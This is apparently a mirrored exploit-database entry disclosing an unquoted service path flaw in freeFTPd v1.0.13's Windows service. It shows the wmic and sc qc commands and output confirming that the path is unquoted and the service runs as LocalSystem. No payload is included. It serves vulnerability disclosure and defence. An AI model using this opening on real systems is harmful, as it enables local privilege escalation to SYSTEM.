Freeftpd v1.0.13 freeftpdservice unquoted service path Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-02-11 | Type : local | Platform : windows
This exploit / vulnerability Freeftpd v1.0.13 freeftpdservice unquoted service path is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeFTPd.exe
Version: 1.0.13
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """
freeFTPdService C:\Program Files\freeSSHd\freeFTPdService.exe Auto

C:\Users\nightelf>sc qc freeFTPdService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: freeFTPdService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\freeSSHd\freeFTPdService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : freeFTPdService
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem